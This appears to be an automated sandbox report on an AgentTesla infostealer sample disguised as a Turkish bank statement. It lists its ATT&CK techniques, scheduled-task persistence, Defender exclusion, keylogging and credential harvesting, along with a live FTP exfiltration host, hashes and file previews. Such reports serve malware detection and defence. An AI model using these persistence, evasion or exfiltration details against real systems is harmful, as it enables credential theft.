                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job
                    1
                    Scheduled Task/Job
                    11
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    21
                    Input Capture
                    24
                    System Information Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    1
                    Non-Standard Port
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Scheduled Task/Job
                    2
                    Obfuscated Files or Information
                    1
                    Credentials in Registry
                    211
                    Security Software Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing
                    NTDS1
                    Process Discovery
                    Distributed Component Object Model21
                    Input Capture
                    11
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets141
                    Virtualization/Sandbox Evasion
                    SSH1
                    Clipboard Data
                    Fallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain Credentials1
                    Application Window Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                    Virtualization/Sandbox Evasion
                    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                    Process Injection
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
Behavior Graph ID: 1463493, Sample: hesaphareketi-.exe, Startdate: 27/06/2024, Architecture: WINDOWS, Score: 100

Start (node 2)
  ftp.normagroup.com.tr [46, DNS/IP]
  Snort IDS alert for network traffic [50, signature]
  Found malware configuration [52, signature]
  Malicious sample detected (through community Yara rule) [54, signature]
  12 other signatures [56, signature]
  started: hesaphareketi-.exe 7 [8, process]
    dropped: C:\Users\user\AppData\...\xyodEPhulIrkY.exe, PE32 [38, file]
    dropped: C:\...\xyodEPhulIrkY.exe:Zone.Identifier, ASCII [40, file]
    dropped: C:\Users\user\AppData\Local\...\tmpE555.tmp, XML [42, file]
    dropped: C:\Users\user\...\hesaphareketi-.exe.log, ASCII [44, file]
    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) [58, signature]
    Uses schtasks.exe or at.exe to add and modify task schedules [60, signature]
    Adds a directory exclusion to Windows Defender [62, signature]
    started: hesaphareketi-.exe 14 2 [14, process]
      ftp.normagroup.com.tr 104.247.165.99, 21, 49705, 49706 ASN-QUADRANET-GLOBALUS United States [48, DNS/IP]
      Installs a global keyboard hook [70, signature]
    started: powershell.exe 23 [18, process]
      Loading BitLocker PowerShell Module [72, signature]
      started: conhost.exe [28, process]
      started: WmiPrvSE.exe [30, process]
    started: powershell.exe 23 [20, process]
      started: conhost.exe [32, process]
    started: schtasks.exe 1 [22, process]
      started: conhost.exe [34, process]
  started: xyodEPhulIrkY.exe 5 [12, process]
    Antivirus detection for dropped file [64, signature]
    Multi AV Scanner detection for dropped file [66, signature]
    Machine Learning detection for dropped file [68, signature]
    started: xyodEPhulIrkY.exe [24, process]
      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) [74, signature]
      Tries to steal Mail credentials (via file / registry access) [76, signature]
      Tries to harvest and steal ftp login credentials [78, signature]
      Tries to harvest and steal browser information (history, passwords, etc) [80, signature]
    started: schtasks.exe [26, process]
      started: conhost.exe [36, process]

Source | Detection | Scanner | Label
hesaphareketi-.exe | 53% | ReversingLabs | Win32.Trojan.Generic
hesaphareketi-.exe | 100% | Avira | HEUR/AGEN.1363658
hesaphareketi-.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | 100% | Avira | HEUR/AGEN.1363658
C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | 53% | ReversingLabs | Win32.Trojan.Generic

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
https://account.dyn.com/ | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://ftp.normagroup.com.tr | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ftp.normagroup.com.tr | 104.247.165.99 | true | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://ftp.normagroup.com.tr | hesaphareketi-.exe, 00000008.00000002.4492018819.000000000304E000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000008.00000002.4492018819.000000000305C000.00000004.00000800.00020000.00000000.sdmp, xyodEPhulIrkY.exe, 0000000D.00000002.4492600143.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, xyodEPhulIrkY.exe, 0000000D.00000002.4492600143.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://account.dyn.com/ | hesaphareketi-.exe, 00000000.00000002.2069027456.0000000003474000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000008.00000002.4487969528.0000000000403000.00000040.00000400.00020000.00000000.sdmp, xyodEPhulIrkY.exe, 00000009.00000002.2100310326.0000000003645000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | hesaphareketi-.exe, 00000000.00000002.2067164468.00000000023E1000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000008.00000002.4492018819.000000000304E000.00000004.00000800.00020000.00000000.sdmp, xyodEPhulIrkY.exe, 00000009.00000002.2098714484.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, xyodEPhulIrkY.exe, 0000000D.00000002.4492600143.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.247.165.99 | ftp.normagroup.com.tr | United States | 8100 | ASN-QUADRANET-GLOBALUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1463493
Start date and time: 2024-06-27 09:15:49 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 4s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: hesaphareketi-.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@19/15@1/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 155
                      • Number of non-executed functions: 5
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • VT rate limit hit for: hesaphareketi-.exe
Time | Type | Description
03:16:39 | API Interceptor | 8430720x Sleep call for process: hesaphareketi-.exe modified
03:16:41 | API Interceptor | 41x Sleep call for process: powershell.exe modified
03:16:44 | API Interceptor | 6140427x Sleep call for process: xyodEPhulIrkY.exe modified
09:16:41 | Task Scheduler | Run new task: xyodEPhulIrkY path: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.247.165.99 | hesaphareketi-01-pdf.exe | malicious | AgentTesla |
 | 19-03-2024_Takas_Sonuclari.exe | malicious | AgentTesla |
 | CN-Invoice-0945413571-XXXXX6856-2312053735707600000.exe | malicious | AgentTesla |
 | hesaphareketi-14-06-2024.exe | malicious | AgentTesla |
 | hesaphareketi01.exe | malicious | AgentTesla |
 | hesaphareketi01--.exe | malicious | AgentTesla |
 | hesaphareketi-01.exe | malicious | AgentTesla |
 | hesaphareketi-.exe | malicious | AgentTesla |
 | hesaphareketi-.exe | malicious | AgentTesla |
 | hesaphareketi-.exe | malicious | AgentTesla |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
ftp.normagroup.com.tr | hesaphareketi-01-pdf.exe | malicious | AgentTesla | 104.247.165.99
 | 19-03-2024_Takas_Sonuclari.exe | malicious | AgentTesla | 104.247.165.99
 | CN-Invoice-0945413571-XXXXX6856-2312053735707600000.exe | malicious | AgentTesla | 104.247.165.99
 | hesaphareketi-14-06-2024.exe | malicious | AgentTesla | 104.247.165.99
 | hesaphareketi01.exe | malicious | AgentTesla | 104.247.165.99
 | hesaphareketi01--.exe | malicious | AgentTesla | 104.247.165.99
 | hesaphareketi-01.exe | malicious | AgentTesla | 104.247.165.99
 | hesaphareketi-.exe | malicious | AgentTesla | 104.247.165.99
 | hesaphareketi-.exe | malicious | AgentTesla | 104.247.165.99
 | hesaphareketi-.exe | malicious | AgentTesla | 104.247.165.99

Match | Associated Sample Name / URL | Detection | Threat Name | Context
ASN-QUADRANET-GLOBALUS | hesaphareketi-01-pdf.exe | malicious | AgentTesla | 104.247.165.99
 | RFQ678903423_PROD_HASUE_de_Mexico_ExportS.exe | malicious | Remcos, DarkTortilla | 64.188.26.202
 | BNP DOC 12578945329763-7633562829.exe | malicious | Remcos | 104.223.119.206
 | 19-03-2024_Takas_Sonuclari.exe | malicious | AgentTesla | 104.247.165.99
 | SWU5109523I.exe | malicious | FormBook, Lokibot | 104.129.27.23
 | BL-RTM1439068.vbs | malicious | GuLoader, Remcos | 64.188.16.157
 | Hecker Glastechnik - Bestellung #009449 PDF.wsf | malicious | AgentTesla, GuLoader | 45.66.217.104
 | AWB Shipping Docs No-285380XXX.exe | malicious | Remcos | 104.223.119.206
 | UNCR76301078976375.wsf | malicious | AgentTesla, GuLoader | 45.66.217.104
 | https://www.optimum.net/api/login/services/v1/signout2?referer=https://docsend.com/view/gnabnfu5rchh7amz | malicious | Phisher | 216.144.225.86
                                          No context
                                          No context
                                          Process:C:\Users\user\Desktop\hesaphareketi-.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1301
                                          Entropy (8bit):5.334025345208678
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4VE4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HT
                                          MD5:C8D49A85A61847AAE0536AE8856F6DEC
                                          SHA1:D4121C87789F6AE40FCB9B4F896BC2A0C79182AD
                                          SHA-256:3F7809C712D948FF3404AE242044B5463E60BCDCE93121886F8CB36799D4E3CE
                                          SHA-512:FFD3460D5B6F00C49D7A91B299765BB7620B440718DACA711566C41A0C153F51E936EE479F4B9E002794EF2E0EBFFCED32ACE15CF9C7A892248EFA6A42468D51
                                          Malicious:true
                                          Reputation:moderate, very likely benign file
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                          Process:C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1301
                                          Entropy (8bit):5.334025345208678
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4VE4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HT
                                          MD5:C8D49A85A61847AAE0536AE8856F6DEC
                                          SHA1:D4121C87789F6AE40FCB9B4F896BC2A0C79182AD
                                          SHA-256:3F7809C712D948FF3404AE242044B5463E60BCDCE93121886F8CB36799D4E3CE
                                          SHA-512:FFD3460D5B6F00C49D7A91B299765BB7620B440718DACA711566C41A0C153F51E936EE479F4B9E002794EF2E0EBFFCED32ACE15CF9C7A892248EFA6A42468D51
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2232
                                          Entropy (8bit):5.379460230152629
                                          Encrypted:false
                                          SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZeUyus:fLHyIFKL3IZ2KRH9Ougos
                                          MD5:28F8623974ADE7FF0B49C3406E91E372
                                          SHA1:739F9DD671D9788B182A7A2D506A3919CA1C6098
                                          SHA-256:3CFE86C229FC35A9886CD7D5A46DFF98C0389C9294C35AA82FA4F907A72E8269
                                          SHA-512:93E2DC72E86EE4006A29687F845FA384C4B3DF320191C77E64CF3EF751D641BB51328F5F36F31FF781F07233A4D3BF24DBC57CCE9B943756257D0A1E0912AB32
                                          Malicious:false
                                          Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe
                                          File Type:XML 1.0 document, ASCII text
                                          Category:dropped
                                          Size (bytes):1586
                                          Entropy (8bit):5.104875849081153
                                          Encrypted:false
                                          SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt7xvn:cgergYrFdOFzOzN33ODOiDdKrsuTlv
                                          MD5:A7E38673D8D14C5D128FB599C014FACC
                                          SHA1:907D9D122F7B428002B302B33974AECF4B2C6776
                                          SHA-256:8C71EFAD2E48D1581934637F7DEE18FD8C5B98D9D4F56CFF1EC8953F4C334249
                                          SHA-512:DE5DD8C706C26832E0E141497C8B7D29E5E9CDFDDDB8E9573F5E2D74DAF088AF8C9E08CE0106242EC07D0418B36A3A3B05DAA3D097A4F70E964B0F1EAE8291A3
                                          Malicious:false
                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                          Process:C:\Users\user\Desktop\hesaphareketi-.exe
                                          File Type:XML 1.0 document, ASCII text
                                          Category:dropped
                                          Size (bytes):1586
                                          Entropy (8bit):5.104875849081153
                                          Encrypted:false
                                          SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt7xvn:cgergYrFdOFzOzN33ODOiDdKrsuTlv
                                          MD5:A7E38673D8D14C5D128FB599C014FACC
                                          SHA1:907D9D122F7B428002B302B33974AECF4B2C6776
                                          SHA-256:8C71EFAD2E48D1581934637F7DEE18FD8C5B98D9D4F56CFF1EC8953F4C334249
                                          SHA-512:DE5DD8C706C26832E0E141497C8B7D29E5E9CDFDDDB8E9573F5E2D74DAF088AF8C9E08CE0106242EC07D0418B36A3A3B05DAA3D097A4F70E964B0F1EAE8291A3
                                          Malicious:true
                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                          Process:C:\Users\user\Desktop\hesaphareketi-.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):615936
                                          Entropy (8bit):7.968233699686794
                                          Encrypted:false
                                          SSDEEP:12288:662o7fX9fXw9/DFmZOfBXZfg86lIEd12cE/hSXpjfVtXhI6:nL9fAJ5SOfBpfz+IeM/hCJxI6
                                          MD5:D8AA0C3EAED283B8D78298748900F395
                                          SHA1:9899CC61CB992DCFE49A04F4A4209852713B4AB5
                                          SHA-256:CE51BC85FA9CF4A581DE693C5901E0C03FFF712C40F723009E393BAD1A18D014
                                          SHA-512:34F42B761DD7A8774F628BB43D50C75202262518DCBAD01D23FCCB3323621852895F6FB1102AF16F3E7863B13A6CEF295F0B00CA987E1F885CDEBA196A974944
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 53%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....g{f.................\...........z... ........@.. ....................................@..................................y..W.................................................................................... ............... ..H............text... Z... ...\.................. ..`.rsrc................^..............@..@.reloc...............d..............@..B.................y......H........A...8......q....<...............................................(.... .........%.+...(.....,... .........%.C...(.....D...(t...*.*..z.(......}.....(....o....}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....on...:q....(....+..(........}.....
                                          Process:C:\Users\user\Desktop\hesaphareketi-.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Preview:[ZoneTransfer]....ZoneId=0
                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.968233699686794
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          File name:hesaphareketi-.exe
                                          File size:615'936 bytes
                                          MD5:d8aa0c3eaed283b8d78298748900f395
                                          SHA1:9899cc61cb992dcfe49a04f4a4209852713b4ab5
                                          SHA256:ce51bc85fa9cf4a581de693c5901e0c03fff712c40f723009e393bad1a18d014
                                          SHA512:34f42b761dd7a8774f628bb43d50c75202262518dcbad01d23fccb3323621852895f6fb1102af16f3e7863b13a6cef295f0b00ca987e1f885cdeba196a974944
                                          SSDEEP:12288:662o7fX9fXw9/DFmZOfBXZfg86lIEd12cE/hSXpjfVtXhI6:nL9fAJ5SOfBpfz+IeM/hCJxI6
                                          TLSH:6DD4231587997273CB941D31EC32B58723B69223B692E7ADBDCC418B2B4738F45C6893
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....g{f.................\...........z... ........@.. ....................................@................................
                                          Icon Hash:00928e8e8686b000
                                          Entrypoint:0x497a1a
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x667B6712 [Wed Jun 26 00:55:46 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          Name | Virtual Address | Virtual Size | Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
